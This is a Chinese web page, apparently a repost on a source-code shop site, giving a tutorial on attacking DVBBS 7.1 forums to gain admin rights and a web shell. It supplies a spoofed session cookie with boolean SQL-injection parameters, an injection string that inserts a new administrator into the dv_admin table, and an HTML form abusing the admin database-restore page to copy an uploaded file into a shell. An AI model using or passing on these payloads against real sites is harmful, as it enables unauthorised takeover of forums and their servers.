源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

最新dvbbs 7.1sql提权得shell

  • 时间:2020-08-04 18:12 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:最新dvbbs 7.1sql提权得shell
dvbbs 7.1跳过死循环,按linzi的方法只能是有一个管理权限,而只是新手上路的等级   如果是sql版,就不好暴库,事实上好像只需要抓取SESSION即可,不要登陆任何用户。   欺骗时不要关闭假死的那个ie   这个是死循环的SESSION:   ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ   加入或替换到可以欺骗的浏览器的cookie栏。   List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ   然后点任何板块   就能发现,你欺骗的用户和等级都是管理员了。   后台管理员可以通过用户奖励那里加入   test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--   dvbbs7.1 sql 后台得shell   <form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">   <p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>   <p>要复制到的位置:<input name="backpath" type="text" size="80"></p>   <p><input type="submit" value="提交"></p>   </form>   好像7.1的usercookies只是个幌子   根本没必要   去掉了也一样可以使用   搞笑  
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部